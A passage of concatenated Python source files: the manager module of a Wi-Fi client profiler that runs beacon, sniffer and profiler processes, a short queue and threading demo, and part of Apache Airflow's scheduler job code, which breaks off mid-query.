# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
profiler2.manager
~~~~~~~~~~~~~~~~~
handle profiler
"""
# standard library imports
import inspect
import logging
import multiprocessing as mp
import os
import platform
import signal
import sys
from datetime import datetime
# third party imports
import scapy
from scapy.all import rdpcap
# app imports
from . import helpers
from .__version__ import __version__
def signal_handler(sig, frame):
""" Suppress stack traces when intentionally closed """
print("SIGINT or Control-C detected... exiting...")
sys.exit(0)
def are_we_root() -> bool:
""" Do we have root permissions? """
if os.geteuid() == 0:
return True
else:
return False
def start(args: dict):
""" Begin work """
log = logging.getLogger(inspect.stack()[0][3])
if args.pytest:
sys.exit("pytest")
if not are_we_root():
log.error("must run with root permissions... exiting...")
sys.exit(-1)
signal.signal(signal.SIGINT, signal_handler)
helpers.setup_logger(args)
log.debug("%s version %s", __name__.split(".")[0], __version__)
log.debug("python platform version is %s", platform.python_version())
log.debug("scapy version is %s", scapy.__version__)
log.debug("args: %s", args)
if args.oui_update:
sys.exit(0) if helpers.update_manuf() else sys.exit(-1)
config = helpers.setup_config(args)
if helpers.validate(config):
log.debug("config %s", config)
else:
log.error("configuration validation failed... exiting...")
sys.exit(-1)
if args.clean and args.files:
clients_dir = os.path.join(config["GENERAL"].get("files_path"), "clients")
helpers.files_cleanup(clients_dir, args.yes)
sys.exit(0)
if args.clean:
reports_dir = os.path.join(config["GENERAL"].get("files_path"), "reports")
helpers.files_cleanup(reports_dir, args.yes)
sys.exit(0)
interface = config.get("GENERAL").get("interface")
channel = int(config.get("GENERAL").get("channel"))
pcap_analysis = config.get("GENERAL").get("pcap_analysis")
listen_only = config.get("GENERAL").get("listen_only")
queue = mp.Queue()
log.debug("%s pid %s", __name__, os.getpid())
if pcap_analysis:
log.info("not starting beacon or sniffer - user wants to do file analysis only")
try:
frame = rdpcap(pcap_analysis)
except FileNotFoundError:
log.exception("could not find file %s", pcap_analysis)
print("exiting...")
sys.exit(-1)
# extract the first frame object from pcap
assoc_req_frame = frame[0]
# put frame into the multiprocessing queue for the profiler to analyze
queue.put(assoc_req_frame)
else:
helpers.generate_run_message(config)
from .fakeap import Sniffer, TxBeacons
boot_time = datetime.now().timestamp()
lock = mp.Lock()
sequence_number = mp.Value("i", 0)
if args.no_interface_prep:
log.warning("skipping interface prep...")
else:
log.info("start interface prep...")
if not helpers.prep_interface(interface, "monitor", channel):
log.error("failed to prep interface")
print("exiting...")
sys.exit(-1)
log.info("done prep interface...")
if listen_only:
log.info("beacon process not started due to listen only mode")
else:
log.info("starting beacon process")
mp.Process(
name="txbeacons",
target=TxBeacons,
args=(config, boot_time, lock, sequence_number),
).start()
log.info("starting sniffer process")
mp.Process(
name="sniffer",
target=Sniffer,
args=(config, boot_time, lock, sequence_number, queue),
).start()
from .profiler import Profiler
log.info("starting profiler process")
mp.Process(name="profiler", target=Profiler, args=(config, queue)).start()
|
join_queue.py
|
import queue
import threading
import time
def do_work(item):
print(f'{threading.current_thread()} removed {item} from the queue')
def worker(queue):
time.sleep(1)
while not queue.empty():
item = queue.get()
if item is None:
print('item is none')
break
do_work(item)
queue.task_done()
q = queue.Queue()
for i in range(5):
q.put(i)
print('Queue populated')
# thread = threading.Thread(target=worker, args=(q,))
# thread.start()
print('Not Progressing Till Queue is Empty')
# fake task_done
q.task_done()
q.task_done()
q.task_done()
q.task_done()
q.task_done()
# block until all tasks are done
q.join()
print('Queue is now empty')
|
scheduler_job.py
|
# pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import sched
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, Callable, DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_, tuple_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, SerializedDagNotFound, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.settings import run_with_db_retries
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to DagFileProcessor.process_file
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
Returns a tuple of 'number of dags found' and 'the count of import errors'
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
self.log.info("Running SLA Checks for %s", dag.dag_id)
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
max_tis: List[TI] = (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
)
.all()
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(
SlaMiss(task_id=ti.task_id, dag_id=ti.dag_id, execution_date=dttm, timestamp=ts)
)
dttm = dag.following_schedule(dttm)
session.commit()
# pylint: disable=singleton-comparison
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
# pylint: enable=singleton-comparison
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas])
blocking_task_list = "\n".join(
[ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis]
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}<code></pre>
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(errors.ImportError.filename == dagbag_file).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
self.log.debug("Processing Callback Request: %s", request)
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure_with_callback(error=request.msg, test_mode=ti.test_mode)
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to this method.
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {'polymorphic_identity': 'SchedulerJob'}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: Any = None,
*args,
**kwargs,
):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(dag_folder=self.subdir, read_dags_from_db=True, load_op_links=False)
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self, old_states: List[str], new_state: str, session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = (
session.query(models.TaskInstance)
.outerjoin(models.TaskInstance.dag_run)
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids)))
.filter(models.TaskInstance.state.in_(old_states))
.filter(
or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
# pylint: disable=no-member
models.DagRun.state.is_(None),
)
)
)
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update(
{
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
}
)
tis_changed = (
session.query(models.TaskInstance)
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date == subq.c.execution_date,
)
.update(ti_prop_update, synchronize_session=False)
)
if tis_changed > 0:
session.flush()
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed,
new_state,
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
query = (
session.query(TI)
.outerjoin(TI.dag_run)
